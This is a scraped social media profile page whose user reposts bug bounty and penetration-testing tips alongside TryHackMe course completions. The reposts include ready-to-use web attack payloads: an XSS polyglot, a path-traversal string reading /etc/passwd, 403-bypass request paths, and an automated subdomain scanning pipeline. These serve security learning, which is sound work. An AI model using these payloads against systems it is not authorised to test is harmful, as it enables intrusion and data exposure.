@srahasan Profile picture

s r ahasan

@srahasan

Joined September 2009
Pinned

#help post I want to learn #JavaScript for hacking purpose. Will you suggest me some resource for this purpose?


s r ahasan Reposted

Posting this so I don't forget a great XSS polyglot javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> Anyone got anymore interesting polyglots?


s r ahasan Reposted

Bug Testing Methodology Series: 𝐗𝐒𝐒 (𝐂𝐫𝐨𝐬𝐬 𝐒𝐢𝐭𝐞 𝐒𝐜𝐫𝐢𝐩𝐭𝐢𝐧𝐠) Learn how to test for #XSS step by step on real #bugbounty programs. Thread🧵👇 #cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity


Authentication Bypass - I have just completed this room! Check it out: tryhackme.com/room/authentic… #tryhackme #security #authenticationbypass via @realtryhackme


Careers in Cyber - I have just completed this room! Check it out: tryhackme.com/room/careersin… #tryhackme #security #career #job #security analyst #security engineer #incident responder #digital forensics examiner #malware analyst #penetration tester #red teamer #careersincyber


Intro to Defensive Security - I have just completed this room! Check it out: tryhackme.com/room/defensive… #tryhackme #security #defensive security #incident response #threat intelligence #malware analysis #DFIR #SOC #SIEM #Security Operations Center #defensivesecurity


Intro to Offensive Security - I have just completed this room! Check it out: tryhackme.com/room/introtoof… #tryhackme #offensive security #introtooffensivesecurity via @realtryhackme


s r ahasan Reposted

#LFI #P1 #bugbountytips #bugbounty 1- Go to admin. site.tld/login 2- Tried to login with wrong credentials > error 3- Send to burp repeater 4- Found new parameter filename because of error 5- tried payload ../../../../../../../../../../../../etc/passwd 6- Full LFI ✅

Tweet Image 1

s r ahasan Reposted

Speak softly and humbly, Do not look down upon others, Be kind, gentle and non-judgemental Learn the adab (manners) of our Prophet (peace be upon him).


s r ahasan Reposted

Nice one! Lets automate it 🔥🔥 cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t severity high -silent | tee -a BugsFound.txt twitter.com/Fozisimi143/st… #bugbountytips #bugbountytip #bugbounty

Easy to find PUT method enabled mis configuration through @pdnuclei 1) Subdomain enumeration 2) http probing through httpx 3) save file into the hosts.txt file 4) run nuclei on hosts.txt file 5) nuclei -l hosts.txt -severty high 6) got a response put-method-enabled

Tweet Image 1


s r ahasan Reposted

🔎 What is your favourite reconnaissance tool? 🔍


s r ahasan Reposted

I need a new chair - what do people recommend these days? I have a @secretlabchairs, but in two years its covering has frayed, and the arms have broken.. looking for other options


s r ahasan Reposted

Bug Type: Reflected XSS Reward : 200$ 1) Pipe domain with waybackurls 2) Grep .php extension URLs and save in a file 3) Use arjun to find hidden parameters 4) Manually test each URL with XSS payloads #bugbountytip #bugbounty #cybersecurity #cybersecuritytips #Pentesting

Tweet Image 1

s r ahasan Reposted

Vroooo @ADITYASHENDE17 finally bypassed the Akamai WAF and exploited the Boolean based SQL😜😜.. Thanks for the tampering suggestion 😂🙊

Tweet Image 1

s r ahasan Reposted

403 Forbidden bypass 🔥🔥 GET /admin ==> 403 Forbidden GET /blablabal/%2e%2e/admin ==> 200 OK GET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OK GET /blablabal/admin/..;/ ==> 200 OK GET /admin?access=1 ==> 200 OK #bugbountytips #bugbountytip #bugbounty


s r ahasan Reposted

Some cool bypassing endpoints: #bugbountytips #infosec #appsec #Pentesting

Tweet Image 1

s r ahasan Reposted

Some cool endpoint bypasses simplified: #bugbountytips #infosec #appsec #pentest

Tweet Image 1

s r ahasan Reposted

Some blind xss techniques simplified: #bugbountytips #infosec #appsec #Pentesting

Tweet Image 1

s r ahasan Reposted

📂 Web 3.0 Smart Contracts Security ∟📂 Top Vulnerabilities ∟📂 Reentrancy ∟📂 Uninitialized Storage Pointer ∟📂 Assert Violation ∟📂 DoS with Failed Call ∟📂 Signature Malleability ∟📂 Integer Overflow and Underflow


s r ahasan Reposted

See a host that's redirecting to Single-Sign on? Don't skip it. Do Content-Discovery. Use gau. Then ffuf. You will be surprised at the misconfigurations you'll find. And the things you can access (that you shouldn't be able to).


United States Trends
Loading...

Something went wrong.


Something went wrong.